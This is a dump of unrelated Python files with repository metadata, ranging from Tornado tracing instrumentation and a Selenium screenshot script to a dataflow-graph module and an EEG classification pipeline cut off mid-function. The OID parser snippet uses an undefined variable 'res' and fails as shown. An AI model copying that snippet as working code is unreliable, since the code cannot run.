            parsed_url.fragment,
        ))
        self.resource['name'] = normalize_http_url(request.url)
        self.resource['operation'] = request.method
        self.resource['metadata']['url'] = request.url
        if not is_payload_collection_blacklisted(full_url):
            add_data_if_needed(
                self.resource['metadata'],
                'request_headers',
                headers
            )
            body = request.body
            if isinstance(body, bytes):
                body = body.decode('utf-8')
            if body:
                add_data_if_needed(
                    self.resource['metadata'],
                    'request_body',
                    body
                )
        # The response future may not be resolved yet; collect its data
        # once it completes.
        if response is not None:
            callback = functools.partial(self.update_response)
            response.add_done_callback(callback)
        if exception is not None:
            self.set_exception(exception, traceback.format_exc())
    def update_response(self, future):
        """
        Adds response data to event.
        :param future: Future response object
        :return: None
        """
        response = future.result()
        self.resource['metadata']['status_code'] = response.code
        self.resource = update_http_headers(
            self.resource,
            dict(response.headers)
        )
        full_url = self.resource['metadata']['url']
        if not is_payload_collection_blacklisted(full_url):
            add_data_if_needed(
                self.resource['metadata'],
                'response_headers',
                dict(response.headers)
            )
            body = response.body
            if isinstance(body, bytes):
                try:
                    body = body.decode('utf-8')
                except UnicodeDecodeError:
                    # Non-UTF-8 payload: fall back to the bytes repr.
                    body = str(body)
            if body:
                add_data_if_needed(
                    self.resource['metadata'],
                    'response_body',
                    body
                )
        # Detect errors based on status code
        if response.code >= HTTP_ERR_CODE:
            self.set_error()
class TornadoClientEventFactory(object):
    """
    Factory class, generates AsyncHTTPClient event.
    """
    @staticmethod
    def create_event(wrapped, instance, args, kwargs, start_time, response,
                     exception):
        """
        Create an AsyncHTTPClient event.
        """
        # Detect if URL is blacklisted, and ignore.
        if is_blacklisted_url(args[0].url):
            return
        event = TornadoAsyncHTTPClientEvent(
            wrapped,
            instance,
            args,
            kwargs,
            start_time,
            response,
            exception
        )
        # The event attaches its own response callback; just record it.
        trace_factory.add_event(event)
| [
"noreply@github.com"
] | epsagon.noreply@github.com |
1692a2ec3f66ebf1aa86968ae915f2a2e635e5cd | 9a7526401349d6004a0ffb94163e75b368e064a1 | /CoffeeCartServer/testMain.py | 539dd8faf0cfc1ca531070bda379bd3ed131f2aa | [] | no_license | jassimran/Coffee-Cart-App | 2ab70d3e4645be4f595b0ff923aab5f90a818616 | 0b187fa82c0cfbfa0384100d0ca2e0dd338e95c0 | refs/heads/master | 2020-03-14T02:26:37.356816 | 2018-04-28T10:27:57 | 2018-04-28T10:27:57 | 131,398,922 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 990 | py | #!/usr/bin/python
import optparse
import sys
import unittest
USAGE = """%prog SDK_PATH TEST_PATH
Run unit tests for App Engine apps.
SDK_PATH Path to the SDK installation
TEST_PATH Path to package containing test modules"""
def main(sdk_path, test_path):
    """Discover and run every *TestCases.py suite under *test_path*.

    *sdk_path* is put at the front of sys.path so the App Engine SDK's
    dev_appserver module can be imported.
    """
    sys.path.insert(0, sdk_path)
    import dev_appserver
    dev_appserver.fix_sys_path()
    suite = unittest.loader.TestLoader().discover(test_path, pattern='*TestCases.py')
    unittest.TextTestRunner(stream=sys.stdout, verbosity=2).run(suite)
if __name__ == '__main__':
    parser = optparse.OptionParser(USAGE)
    options, args = parser.parse_args()
    if len(args) == 0:
        # No arguments: fall back to the default SDK/test locations.
        # NOTE(review): passing exactly one argument still raises IndexError
        # on args[1] below.
        #parser.print_help()
        SDK_PATH = "/usr/local/google_appengine"
        TEST_PATH = "./UnitTest"
        print ('Using default paths\n sdk:%s\n test:%s' % (SDK_PATH, TEST_PATH))
    else:
        SDK_PATH = args[0]
        TEST_PATH = args[1]
    main(SDK_PATH, TEST_PATH)
| [
"just.simmi@gmail.com"
] | just.simmi@gmail.com |
4125a3a6906417841daee6699df1daa262068870 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03069/s036551857.py | 273e2d32d2871800eb6b588af947e2fe9c71f0b3 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 269 | py | import sys,math,collections,itertools
# Fast stdin reader (deliberately shadows the input() builtin).
input = sys.stdin.readline
N = int(input())
s = input().rstrip()
# Left-to-right scan over split points: cntb counts '#' seen so far (left
# side), cntw counts '.' remaining to the right.  ans is the minimum
# cntb + cntw over all splits -- presumably the fewest characters to change
# so the string has the form '.'*a + '#'*b; confirm against the original
# problem statement.
cntb =0
cntw = s.count('.')
ans =cntw
for i in range(len(s)):
    if s[i] == '#':
        cntb +=1
    else:
        cntw -=1
        ans = min(ans,cntb+cntw)
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
f6bdf4d9d98945b174ea3626cac9c7f21706ba7e | 73e939e797cc28aa33a4f55c234237c47167033e | /test/test_transaction_summary.py | b5bc1ae60e987c82adcad1bf24cbb8c6ef351245 | [] | no_license | dmlerner/ynab-api | b883a086e6ce7c5d2bdb5b17f3f0a40dbb380046 | df94b620d9ec626eacb9ce23bfd313f1c589b03a | refs/heads/master | 2023-08-17T14:22:17.606633 | 2023-07-03T17:05:16 | 2023-07-03T17:05:16 | 223,287,209 | 27 | 13 | null | 2023-08-05T18:58:58 | 2019-11-21T23:58:22 | Python | UTF-8 | Python | false | false | 975 | py | """
YNAB API Endpoints
Our API uses a REST based design, leverages the JSON data format, and relies upon HTTPS for transport. We respond with meaningful HTTP response codes and if an error occurs, we include error details in the response body. API Documentation is at https://api.youneedabudget.com # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import ynab_api
from ynab_api.model.transaction_summary import TransactionSummary
class TestTransactionSummary(unittest.TestCase):
    """TransactionSummary unit test stubs (generated by OpenAPI Generator)."""
    def setUp(self):
        pass
    def tearDown(self):
        pass
    def testTransactionSummary(self):
        """Test TransactionSummary"""
        # FIXME: construct object with mandatory attributes with example values
        # model = TransactionSummary() # noqa: E501
        pass
# Allow running the generated stubs directly.
if __name__ == '__main__':
    unittest.main()
| [
"dmlerner@gmail.com"
] | dmlerner@gmail.com |
01ef9cb216b469f0fd9d4d1c37cac3dcd6c36be7 | 75536622efb5b10f0d489e0733d2810a0225f679 | /scripts/sample.py | 471d6de48ae280b1f67a5f6175513ec592b96bce | [] | no_license | 6br/panacea | a08123a8c241a1b683624e8d91495d4389826831 | 3b336e1f34ae4aa84f29ac95d06cae1567bc1055 | refs/heads/master | 2022-12-05T09:53:10.848942 | 2020-09-03T06:16:30 | 2020-09-03T06:16:30 | 212,508,380 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,988 | py | import os
import sys
import time
import datetime
from concurrent.futures import ThreadPoolExecutor
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
# Output file -> dashboard URL for single screenshots.
# SECURITY NOTE(review): the URLs embed basic-auth credentials
# ("user:pass"); consider moving them out of source control.
condition = {
    "image/fig3a.png": "http://user:pass@0.0.0.0:8080/?preset=Fig4a",
    "image/fig3b.png": "http://user:pass@0.0.0.0:8080/?preset=Fig4b",
    "image/fig3c.png": "http://user:pass@0.0.0.0:8080/?preset=Fig4c",
    "image/fig2.png": "http://user:pass@0.0.0.0:8080/?preset=Default"
}
# Output directory -> URL for 40-frame time-lapse captures (see save_png).
timelapse = {
    "image/fig1_4/": "http://user:pass@0.0.0.0:8080/?preset=Fig1",
    "image/fig5/": "http://user:pass@0.0.0.0:8080/?preset=Fig5",
    "image/fig6/": "http://user:pass@0.0.0.0:8080/?preset=Fig6"
}
# Per-run output directory named with the current timestamp.
DIR=os.path.join(os.path.dirname(os.path.abspath(__file__)), datetime.datetime.now().strftime('%Y%m%d-%H%M%S'))
if not os.path.exists(DIR):
    os.mkdir(DIR)
if not os.path.exists(DIR + "/image"):
    os.mkdir(DIR+"/image")
def save_png(driver, file, url, isMultiple):
    """Open *url* in *driver* and save screenshot(s) under DIR/file.

    isMultiple=True captures a 40-frame series into the directory *file*;
    otherwise a single screenshot named *file* is written.
    Window-sizing technique: https://qiita.com/hujuu/items/ef89c34fca955cc571ec
    """
    driver.get(url)
    #time.sleep(5)
    # Resize the window to the full page so the screenshot is not clipped.
    w = driver.execute_script("return document.body.scrollWidth;")
    h = driver.execute_script("return document.body.scrollHeight;")
    driver.set_window_size(w,h)
    time.sleep(2)
    # Wait (up to 30s) until the page tags itself with 'contentsLoaded'.
    # CLEANUP: the wait result was bound to an unused `element` variable;
    # only the waiting side effect matters.
    WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.CLASS_NAME, 'contentsLoaded')))
    if isMultiple:
        if not os.path.exists(os.path.join(DIR, file)):
            os.mkdir(os.path.join(DIR, file))
        for i in range(0, 40):
            FILENAME = os.path.join(DIR, file + str(i) + ".png")
            driver.save_screenshot(FILENAME)
            time.sleep(0.75)
    else:
        time.sleep(12)
        FILENAME = os.path.join(DIR, file)
        driver.save_screenshot(FILENAME)
def driverfunc(k, v, arg):
    """Launch a Chrome instance, capture URL *v* into output *k*, then quit."""
    options = Options()
    #options.add_argument('--headless')
    driver = webdriver.Chrome(options=options, executable_path='/usr/local/bin/chromedriver')
    driver.maximize_window()
    #driver.set_window_size(1920, 1280) # Full hd
    driver.set_page_load_timeout(20)
    save_png(driver, k, v, arg)
    driver.quit()
# NOTE(review): the executor is currently unused -- the captures below run
# sequentially because every submit() call is commented out.
executor = ThreadPoolExecutor(max_workers=2)
for (k, v) in condition.items():
    #save_png(driver, k, v, False)
    driverfunc(k, v, False)
    #executor.submit(driverfunc, k, v, False)
for (k, v) in timelapse.items():
    #save_png(driver, k, v, True)
    driverfunc(k, v, True)
    #executor.submit(driverfunc, k, v, True)
# Close Web Browser
#driver.quit()
# Prepare the executor used for parallel execution.
# max_workers is the maximum degree of parallelism.
#for t in testcase:
# executor.submit(driverfunc,t) | [
"tfdvrt@gmail.com"
] | tfdvrt@gmail.com |
8b9a1d2c684d7a07e09c72b4df3f6954ff8d244a | c06a2fa5bc47a4801d70617e9519a19f7df8789e | /fbml/element.py | 849d2b0c899b4ae67fd896c03ad3de9f092ea22b | [] | no_license | kalhauge/fbml-old | bc29317a605e7aa5a64ffc88d8996273284cbb5f | 2211270a21535370838fc40c6e5db6f5f08c2e50 | refs/heads/master | 2020-05-18T10:12:26.073990 | 2013-09-04T19:08:09 | 2013-09-04T19:08:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,430 | py | """
.. currentmodule:: fbml.element
.. moduleauthor:: Christian Gram Kalhauge
"""
import pprint
from collections import namedtuple, deque
import logging
log = logging.getLogger(__name__)
from fbml.util import Immutable, namedtuple_from_dict
from operator import attrgetter
# (function, slot) pair used as a Sink's target (see Sink.owner / Sink.slot).
From = namedtuple('From', ['function', 'slot'])
class Element(Immutable):
    """Common immutable base for dataflow graph elements."""
    pass
class Sink (Element):
    """A value attached to a (function, slot) target in the dataflow graph."""
    def __init__ (self, target, data):
        # Immutable stores the constructor arguments as attributes;
        # see fbml.util.Immutable.
        Immutable.__init__(**locals())
    @classmethod
    def new(cls, target, data={}):
        # NOTE: the {} default is shared but only read here, never mutated.
        return cls(target, namedtuple_from_dict("SinkData", data))
    @property
    def owner(self):
        # The function producing this sink's value.
        return self.target.function
    @property
    def slot(self):
        return self.target.slot
    def depth(self, helper):
        # Memoized depth: one more than the owning function's depth.
        if not self in helper:
            helper[self] = self.owner.depth(helper) + 1
        return helper[self]
    def __str__(self):
        return 'Sink : {self.data.id!r} at \n{self.owner!s}'.format(**locals())
    def update_data(self, function, data={}):
        # Copy of this sink re-targeted at *function*, with *data* merged
        # over the existing data fields.
        new_data = dict(vars(self.data))
        new_data.update(data)
        return self.new(From(function,self.slot),new_data)
# Sink subtype selected by Impl.internal_sinks.
class Internal(Sink): pass
class Source(Sink):
    """A Sink bound directly to an input slot; it has no owning function."""
    def __init__(self, slot, data):
        Immutable.__init__(**locals())
    @classmethod
    def new(cls, slot, data={}):
        return cls(
            slot = slot,
            data = namedtuple_from_dict("SourceData", data)
        )
    @property
    def owner(self):
        # Sources are graph roots; nothing produces them.
        return None
    @property
    def slot(self):
        # Bypass the Sink property, which would read self.target.
        return self.__dict__['slot']
    def depth(self, helper):
        # Graph roots sit at depth zero.
        return 0
    def __str__(self):
        return 'Source : {self.data.id!r} at {self.slot!r}'.format(**locals())
    def update_data(self, data={}):
        # Copy with *data* merged over the existing data fields.
        new_data = dict(vars(self.data))
        new_data.update(data)
        return self.new(self.slot,new_data)
class Constant(Sink):
    """A Sink holding a fixed value; like Source it has no owner and depth 0."""
    def __init__(self, data):
        Immutable.__init__(**locals())
    @classmethod
    def new(cls, data={}):
        return cls(
            data = namedtuple_from_dict("ConstantData", data)
        )
    @property
    def owner(self):
        return None
    def depth(self, helper):
        return 0
    def __str__(self):
        return 'Constant : {self.data.id!r}'.format(**locals())
    def update_data(self, data={}):
        # Copy with *data* merged over the existing data fields.
        new_data = dict(vars(self.data))
        new_data.update(data)
        return self.new(new_data)
# Sink subtype marking an implementation's outputs (see Impl.targets).
class Target(Sink): pass
class Function (Element):
    """A graph node consuming a named tuple of source sinks."""
    def __init__(self, sources, data):
        Immutable.__init__(**locals())
    @classmethod
    def new(cls, sources, data={}):
        return cls(
            sources = namedtuple_from_dict("Sources", sources),
            data = namedtuple_from_dict("FunctionData", data)
        )
    def depth(self,helper):
        # Memoized: one more than the deepest source sink (0 if no sources).
        if not self in helper:
            if not self.sources: depth = 0;
            else: depth = max(sink.depth(helper)
                    for sink in self.sources) +1
            helper[self] = depth;
        return helper[self]
    def __str__(self):
        return 'Function'
    def update_data(self, sink_data, data={}):
        # Rebuild the function with every source mapped through the
        # sink -> new-sink mapping *sink_data*, and *data* merged in.
        new_data = dict(vars(self.data).items())
        new_data.update(data)
        new_sinks = {slot: sink_data[sink] for slot, sink in vars(self.sources).items()}
        return Function.new(new_sinks, new_data)
    def __repr__(self):
        return "<FUNCTION " + str(id(self)) + ">"
def _get_sinks_of_type(sink_type):
    """Build a property getter that filters self.sinks by *sink_type*."""
    def get_sinks(self):
        return ( sink for sink in self.sinks if isinstance(sink, sink_type) )
    return get_sinks
class Impl (Immutable):
    """An implementation: its target sinks plus every reachable sink/function."""
    def __init__ (self, targets, sinks, functions):
        Immutable.__init__(**locals())
    @classmethod
    def new(cls, target_sinks):
        target_sinks = namedtuple_from_dict('Targets',target_sinks)
        sinks, functions = Impl._calculate_reach(target_sinks)
        return cls(
            targets = target_sinks,
            sinks = sinks,
            functions = functions)
    @staticmethod
    def _calculate_reach(target_sinks):
        """Breadth-first walk from the targets collecting all sinks/functions."""
        #import pdb; pdb.set_trace()
        sinks = set()
        functions = set()
        calc_sinks = deque(target_sinks)
        while calc_sinks:
            sink = calc_sinks.popleft()
            if sink in sinks: continue
            sinks.add(sink)
            function = sink.owner
            if function:
                if function in functions: continue
                functions.add(function)
                calc_sinks.extend(function.sources)
        return frozenset(sinks), frozenset(functions)
    def functions_with_targets(self, functions):
        # Group the known sinks by their owning function, then yield each
        # requested function with its set of (slot, sink) pairs.
        targets = {}
        for sink in self.sinks:
            if sink.owner:
                targets.setdefault(sink.owner,set()).add((sink.target.slot, sink))
        return ((function, targets[function]) for function in functions)
    # Filtered views over self.sinks by concrete Sink subtype.
    constant_sinks = property(_get_sinks_of_type(Constant))
    internal_sinks = property(_get_sinks_of_type(Internal))
    source_sinks = property(_get_sinks_of_type(Source))
    target_sinks = property(attrgetter('targets'))
    def update_data(self, sink_data):
        # Rebuild from the targets mapped through *sink_data*; the
        # reachability sets are recomputed by new().
        new_sinks = {slot: sink_data[sink]
                for slot, sink in vars(self.targets).items()}
        return Impl.new(new_sinks)
    def __repr__(self):
        return "<IMPL " + str(id(self)) + ">"
| [
"christian@kalhauge.dk"
] | christian@kalhauge.dk |
14249c6ddfac1936e3eae837ec0c193148ba9a71 | 2cbe3c441daf456ce38b97bb5cb6479d91d9f72b | /tutorial4.py | b3627758bac679e12a9e0ae1c122f3b17610422d | [
"MIT"
] | permissive | kingmayonaise/empty-app | f336ac5b23512278a0c9a0c18f43d106d6ac0b07 | af6f084ea292e62d7ec2e865738c916d0407fedb | refs/heads/master | 2021-01-18T05:02:53.594421 | 2016-11-17T01:38:46 | 2016-11-17T01:38:46 | 67,625,882 | 0 | 0 | null | 2016-09-07T16:45:35 | 2016-09-07T16:45:35 | null | UTF-8 | Python | false | false | 824 | py | from ggame import App, RectangleAsset, ImageAsset, Sprite, LineStyle, Color, Frame
# Game window dimensions in pixels.
SCREEN_WIDTH = 640
SCREEN_HEIGHT = 480
class SpaceShip(Sprite):
    """
    Animated space ship
    """
    # Four vertically stacked 65x125 frames cropped from the sprite sheet
    # (frame width = 292 - 227).
    asset = ImageAsset("images/four_spaceship_by_albertov_with_thrust.png",
        Frame(227,0,292-227,125), 4, 'vertical')
    def __init__(self, position):
        super().__init__(SpaceShip.asset, position)
class SpaceGame(App):
    """
    Tutorial4 space game example.
    """
    def __init__(self, width, height,):
        super().__init__(width, height)
        black = Color(0, 1)
        noline = LineStyle(0, black)
        # NOTE(review): the background rectangle uses the SCREEN_* globals
        # rather than the width/height parameters -- confirm intended.
        bg_asset = RectangleAsset(SCREEN_WIDTH, SCREEN_HEIGHT, noline, black)
        # bg is kept only for its construction side effect; presumably the
        # Sprite registers itself with the App -- verify against ggame.
        bg = Sprite(bg_asset, (0,0))
        SpaceShip((100,100))
# Create the game at the default resolution and start the event loop.
myapp = SpaceGame(SCREEN_WIDTH, SCREEN_HEIGHT)
myapp.run()
| [
"danielmelnikov@hanovernorwichschools.org"
] | danielmelnikov@hanovernorwichschools.org |
dd374ab7f5502aff595c11cccbb73827945a7707 | 97f0330bb5a2050adc81871693d062cb730d22f6 | /y3s1/DMD/HW10/dbms/index.py | 8ab881d90684217e68df094c3149e7a6a2a3708b | [] | no_license | ariser/Innopolis | 56d5ef62a031d3b67bad93175868fd24d305ff5b | 7f1159368f0b4cc66cea9f36b1c208ea40d362c1 | refs/heads/master | 2021-01-10T13:52:07.154146 | 2017-04-20T08:46:38 | 2017-04-20T08:46:38 | 44,034,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | from dbms.vendor.btree import BPlusTree
class Index(object):
    """An index structure backed by a B+ tree."""

    # __slots__ avoids a per-instance __dict__; only the tree is stored.
    __slots__ = ['btree']

    def __init__(self):
        # 2 is presumably the tree order/branching factor — confirm against
        # the dbms.vendor.btree.BPlusTree signature.
        self.btree = BPlusTree(2)
| [
"ariser@ariser.ru"
] | ariser@ariser.ru |
08a1dfe046c907ca12715962c37263dd701a1167 | ee358856cbb844db19c82a03698e728cb5f1cc40 | /random_parser.py | 9c5a304c45123c355c64387be06f8e6f1f985ed9 | [] | no_license | Ramaraja/python-snippets | 789c0bd91d9be96f935a2439c054afeb2dc41a1e | dc7706471a634273102877bc77a6097dd161a56f | refs/heads/master | 2023-05-31T03:22:55.788556 | 2023-05-18T09:11:38 | 2023-05-18T09:11:38 | 102,446,629 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 964 | py | # parser
data = """
NAME: "1", "DESCR": "C1000"
PID: EC1K-TEST , VID: V00 , SN: 193823648
OID: 1.2.3.4.5.6
NAME: "2", "DESCR": "C1000"
PID: EC1K-TEST , VID: V00 , SN: 193823648
OID: 1.2.3.4.5.6
"""
def oid_parser(data):
    """Parse blank-line-separated records of 'KEY: value' fields.

    Records are separated by double newlines; within a record, fields are
    separated by newlines and/or commas.  Double quotes are discarded.

    Returns a list of dicts, one per record, with keys and values stripped
    of surrounding whitespace.

    Improvements over the original:
    - splits each field on the *first* colon only (``str.partition``), so
      values containing ':' no longer raise ValueError;
    - skips empty fields instead of crashing on them;
    - strips whitespace from values at parse time, so callers no longer
      need to re-strip.
    """
    records = data.split('\n\n')
    result = []
    for item in records:
        # Remove surrounding whitespace/quotes and flatten the record into
        # a single comma-separated field list.
        flat_val = item.strip(' \n\t\"').replace("\n", ",").replace('"', '')
        fields = [f.strip() for f in flat_val.split(',') if f.strip()]
        record = {}
        for field in fields:
            key, _, value = field.partition(':')
            record[key.strip()] = value.strip()
        result.append(record)
    return result
print(res)
# test searching name and fetch oid
for item in res:
if str(item.get("NAME")).strip() == "1":
print(item.get("OID"))
| [
"noreply@github.com"
] | Ramaraja.noreply@github.com |
a8a168e45728b281c365ca8ea4ef5d5893de1049 | 57d2e77aa5e97c49d76a33a8a572eeabe82bc571 | /project/eeg_classification.py | 5f4dbca9e83af33fa1e5e1e9d678df80acf400f8 | [
"MIT"
] | permissive | boredStats/eeg-machine-learning | 167afd928d78df67db08ddfebeaf6e090a8aa250 | bbf72ef55644f3941120f8f9007d839c1a4731fd | refs/heads/master | 2022-10-03T19:58:03.901354 | 2019-12-10T18:11:58 | 2019-12-10T18:11:58 | 189,074,610 | 1 | 0 | MIT | 2022-09-30T18:46:42 | 2019-05-28T17:37:06 | Python | UTF-8 | Python | false | false | 17,994 | py | import numpy as np
import pandas as pd
import pickle as pkl
import proj_utils as pu
from os.path import isdir, join
from os import mkdir
from copy import deepcopy
from imblearn.over_sampling import RandomOverSampler, SMOTE
from imblearn.under_sampling import RandomUnderSampler
from sklearn import ensemble, feature_selection, model_selection, preprocessing, svm, metrics, neighbors
from sklearn.utils.testing import ignore_warnings
from sklearn.utils import shuffle
from sklearn.exceptions import ConvergenceWarning
seed = 13
def calc_scores(y_test, predicted):
    """Compute one fold's evaluation metrics.

    Returns a tuple (balanced accuracy, chance-adjusted balanced accuracy,
    per-class F1 array).
    """
    balanced = metrics.balanced_accuracy_score(y_test, predicted)
    # adjusted=True rescales the score so random guessing lands at 0.
    chance = metrics.balanced_accuracy_score(y_test, predicted, adjusted=True)
    # average=None -> an array with one F1 score per class.
    f1 = metrics.f1_score(y_test, predicted, average=None)
    return balanced, chance, f1
def save_scores(f1_scores, balanced_scores, chance_scores, class_labels):
    """Assemble per-fold scores into DataFrames with an 'Average' row.

    Parameters
    ----------
    f1_scores : list of array-like
        Per-fold, per-class F1 scores (one row per fold).
    balanced_scores, chance_scores : list of float
        Per-fold balanced / chance-adjusted accuracies.  Unlike the
        original, the input lists are NOT mutated (the original appended
        the mean in place, silently corrupting the caller's lists).
    class_labels : sequence
        Column labels for the F1 DataFrame.

    Returns
    -------
    (f1_df, score_df) : tuple of pandas.DataFrame
        F1 table and accuracy table, each with one row per fold plus a
        final cross-fold 'Average' row.

    Raises
    ------
    ValueError
        If the number of F1 rows does not match the number of folds.
    """
    n_folds = len(balanced_scores)
    f1_array = np.asarray(f1_scores)
    if n_folds != f1_array.shape[0]:
        raise ValueError("Number of folds does not match")

    rownames = ['Fold %02d' % (n + 1) for n in range(n_folds)]
    rownames.append('Average')

    # Per-class F1 averaged over folds, stacked as the final row.
    f1_data = np.vstack((f1_array, np.mean(f1_array, axis=0)))
    f1_df = pd.DataFrame(f1_data, index=rownames, columns=class_labels)

    # Work on copies so the caller's lists are left untouched.
    balanced = list(balanced_scores) + [np.mean(balanced_scores)]
    chance = list(chance_scores) + [np.mean(chance_scores)]
    accuracy_data = np.asarray([balanced, chance]).T
    score_df = pd.DataFrame(data=accuracy_data, index=rownames,
                            columns=['Balanced accuracy', 'Chance accuracy'])
    return f1_df, score_df
def svmc(x_train, y_train, x_test, cleaned_features):
    """Train a linear SVM on one fold and predict the held-out samples.

    Returns (predictions, coefficient DataFrame, fitted classifier).
    For binary problems sklearn's LinearSVC exposes a single coefficient
    row, hence the special-cased 'coefficients' index label.
    """
    clf = svm.LinearSVC(fit_intercept=False, random_state=seed)
    clf.fit(x_train, y_train)
    target_classes = clf.classes_
    target_classes = [str(c) for c in target_classes]
    predicted = clf.predict(x_test)
    if len(target_classes) == 2:
        idx_label = ['coefficients']
    else:
        idx_label = target_classes
    # One column per surviving (feature-selected) input feature.
    coef_df = pd.DataFrame(clf.coef_, index=idx_label, columns=cleaned_features)
    return predicted, coef_df, clf
def extra_trees(x_train, y_train, x_test, cleaned_features):
    """Train an extra-trees ensemble on one fold and predict the test fold.

    Returns (predictions, single-row DataFrame of feature importances,
    fitted classifier).
    """
    clf = ensemble.ExtraTreesClassifier(random_state=seed)
    clf.fit(x_train, y_train)
    predicted = clf.predict(x_test)
    feature_df = pd.DataFrame(columns=cleaned_features)
    feature_df.loc['feature_importances'] = clf.feature_importances_
    return predicted, feature_df, clf
def knn(x_train, y_train, x_test):
    """Train a k-nearest-neighbours classifier (sklearn defaults) on one
    fold and predict the test fold.  Returns (predictions, fitted clf);
    no feature weights exist for kNN, hence no coefficient frame.
    """
    clf = neighbors.KNeighborsClassifier()
    clf.fit(x_train, y_train)
    predicted = clf.predict(x_test)
    return predicted, clf
def convert_hads_to_single_label(hads_array):
    """Collapse the two binned HADS subscales into one combined label.

    Column 0 is anxiety, column 1 is depression; bin codes 0/1/2 map to
    normal/borderline/abnormal.  Returns one
    'anxiety_<severity>-depression_<severity>' string per row.
    """
    severity = {0: 'normal', 1: 'borderline', 2: 'abnormal'}
    subscales = ('anxiety', 'depression')
    combined_labels = []
    for codes in hads_array.astype(int):
        parts = ['%s_%s' % (scale, severity[code])
                 for scale, code in zip(subscales, codes)]
        combined_labels.append('-'.join(parts))
    return combined_labels
def feature_selection_with_covariates(x_train, x_test, y_train, continuous_indices, categorical_indices, feature_names):
    """Preprocess and feature-select one fold when covariates are present.

    Continuous columns are z-scored (fit on train only); categorical
    (dummy-coded) columns pass through a zero-variance filter.  The two
    groups are re-concatenated and pruned with an extra-trees importance
    threshold of twice the mean importance.

    Returns (x_train_selected, x_test_selected, surviving feature names).
    Note: all transformers are fit on the training fold only, so there is
    no train/test leakage.
    """
    # Split data for continuous, categorical preprocessing
    x_train_cont, x_test_cont = x_train[:, continuous_indices], x_test[:, continuous_indices]
    x_train_cat, x_test_cat = x_train[:, categorical_indices], x_test[:, categorical_indices]

    # Standardization for continuous data
    preproc = preprocessing.StandardScaler().fit(x_train_cont)
    x_train_z = preproc.transform(x_train_cont)
    x_test_z = preproc.transform(x_test_cont)

    # Variance threshold for categorical data (drops constant dummies)
    varthresh = feature_selection.VarianceThreshold(threshold=0).fit(x_train_cat)
    x_train_v = varthresh.transform(x_train_cat)
    x_test_v = varthresh.transform(x_test_cat)

    x_train_data = np.hstack((x_train_z, x_train_v))
    x_test_data = np.hstack((x_test_z, x_test_v))

    # Feature selection with extra trees
    extra_tree_fs = ensemble.ExtraTreesClassifier(random_state=seed)
    feature_model = feature_selection.SelectFromModel(extra_tree_fs, threshold="2*mean")

    # Transform train and test data with feature selection model
    x_train_feature_selected = feature_model.fit_transform(x_train_data, y_train)
    x_test_feature_selected = feature_model.transform(x_test_data)
    # Map surviving column indices back to human-readable names.
    feature_indices = feature_model.get_support(indices=True)
    cleaned_features = [feature_names[i] for i in feature_indices]
    return x_train_feature_selected, x_test_feature_selected, cleaned_features
def feature_selection_without_covariates(x_train, x_test, y_train, feature_names):
    """Preprocess and feature-select one fold (connectivity features only).

    Z-scores all columns (fit on train only), then prunes them with an
    extra-trees importance threshold of twice the mean importance.
    Returns (x_train_selected, x_test_selected, surviving feature names).
    """
    # Standardization for continuous data
    preproc = preprocessing.StandardScaler().fit(x_train)
    x_train_z = preproc.transform(x_train)
    x_test_z = preproc.transform(x_test)

    # Feature selection with extra trees
    extra_tree_fs = ensemble.ExtraTreesClassifier(random_state=seed)
    feature_model = feature_selection.SelectFromModel(extra_tree_fs, threshold="2*mean")

    # Transform train and test data with feature selection model
    x_train_feature_selected = feature_model.fit_transform(x_train_z, y_train)
    x_test_feature_selected = feature_model.transform(x_test_z)
    feature_indices = feature_model.get_support(indices=True)
    cleaned_features = [feature_names[i] for i in feature_indices]
    return x_train_feature_selected, x_test_feature_selected, cleaned_features
@ignore_warnings(category=ConvergenceWarning)
def eeg_classify(eeg_data, target_data, target_type, model, outdir=None, resample='SMOTE'):
    """Run a resampled, stratified k-fold classification experiment.

    Parameters
    ----------
    eeg_data : pandas.DataFrame
        Feature matrix; covariate columns are dummy-coded with a
        "categorical_" name prefix.
    target_data : array-like
        One class label per row of `eeg_data`.
    target_type : str
        Target name, used in output folder names.
    model : str
        One of 'svm', 'extra_trees', 'knn'.
    outdir : str or None
        If given, results are written under this directory; if None,
        nothing is saved.
    resample : str
        One of 'no_resample', 'ROS', 'SMOTE', 'RUS'.

    Returns
    -------
    dict
        {'accuracy scores': DataFrame, 'f1 scores': DataFrame}.

    Fixes vs. the original:
    - string options compared with `==` instead of `is` (identity on str
      literals only worked by CPython interning accident);
    - unknown `model`/`resample` values raise ValueError instead of a
      confusing NameError;
    - saving is skipped explicitly when `outdir` is None (the original
      relied on a NameError swallowed by `except Exception: pass`), and
      save failures are reported instead of silently ignored.
    """
    feature_names = list(eeg_data)
    # Covariates are detected via a sentinel dummy-coded column.
    if "categorical_sex_male" in feature_names:
        cv_check = 'with_covariates'
    else:
        cv_check = 'without_covariates'

    if resample == 'no_resample':
        class NoResample:  # pass-through exposing the imblearn fit_resample API
            @staticmethod
            def fit_resample(a, b):
                return a.values, np.asarray(b)
        resampler = NoResample()
    elif resample == 'ROS':
        resampler = RandomOverSampler(sampling_strategy='not majority', random_state=seed)
    elif resample == 'SMOTE':
        resampler = SMOTE(sampling_strategy='not majority', random_state=seed)
    elif resample == 'RUS':
        resampler = RandomUnderSampler(sampling_strategy='not minority', random_state=seed)
    else:
        raise ValueError("Unknown resample method: %r" % resample)

    x_res, y_res = resampler.fit_resample(eeg_data, target_data)

    model_outdir = None
